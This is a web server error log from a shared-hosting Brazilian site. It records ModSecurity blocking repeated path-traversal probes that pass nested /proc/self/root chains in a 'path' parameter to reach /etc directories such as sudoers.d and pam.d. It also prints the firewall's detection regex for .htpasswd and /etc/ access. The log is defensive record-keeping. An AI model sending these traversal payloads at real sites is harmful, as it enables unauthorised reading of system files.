[Thu Mar 19 11:00:55.892643 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:47172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBl_u8EFLIOrSqIpunNAAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:00:56.129790 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57364] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:01:00.295157 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.244.43:60036] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwBnMdf6f5d65gmYZR3_gAAAsI"]
[Thu Mar 19 11:01:01.425680 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.243.128:35312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBnf-YZRR_7pZ7nDKM0gAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:01:05.862940 2026] [:error] [pid 27403:tid 140411641214720] [client 74.7.243.128:54890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBoRkFeYa1D6dYQnDxQAAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:01:08.949733 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.243.128:54898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBpP-YZRR_7pZ7nDKM1gAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:01:18.131841 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57852] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:01:32.140731 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:44986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBvPu8EFLIOrSqIpunaAAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:01:41.239142 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:54844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwBxda6ubjKNq_cu4ZUYQAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:01:41.937027 2026] [core:alert] [pid 17653:tid 140411691570944] [client 57.141.18.92:60240] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 11:01:44.125810 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58374] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:01:58.872846 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:51162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwB1gkwaGbbGflqUZDCWwAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:02:09.620703 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:44950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwB4f-YZRR_7pZ7nDKM7gAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:02:18.137836 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59044] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:02:23.399647 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:57692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwB7-yqAr6etmhZHNph3QAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:02:28.412714 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:53424] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwB9AbLMZ6AikZjR9VekwAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:02:36.890194 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:50332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwB_Na6ubjKNq_cu4ZUogAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:02:43.388580 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:59644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCAta6ubjKNq_cu4ZUqgAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:02:52.137089 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59888] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:03:22.045835 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60530] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:03:22.955459 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:48570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCKvu8EFLIOrSqIpunogAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:03:51.059944 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32886] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:04:14.165522 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:40044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCXsdf6f5d65gmYZR4SgAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:04:17.129929 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33558] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:04:19.434907 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.228.61:42428] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwCY-yqAr6etmhZHNpiFQAAAE0"]
[Thu Mar 19 11:04:23.007251 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.243.128:50924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCZxkFeYa1D6dYQnDxhwAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:04:39.133813 2026] [proxy_fcgi:error] [pid 19093:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34074] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:04:53.086677 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:35992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCheoXxyEfFpUF8f8PsQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:05:01.129823 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34590] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:05:12.218824 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:44288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCmOyqAr6etmhZHNpiMAAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:05:26.044508 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.243.128:49206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCphkFeYa1D6dYQnDxrQAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:05:30.117586 2026] [proxy_fcgi:error] [pid 19093:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35268] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:05:36.306187 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:37720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCsOoXxyEfFpUF8f8PwQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:05:42.875468 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:37724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwCtgkwaGbbGflqUZDC0wAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
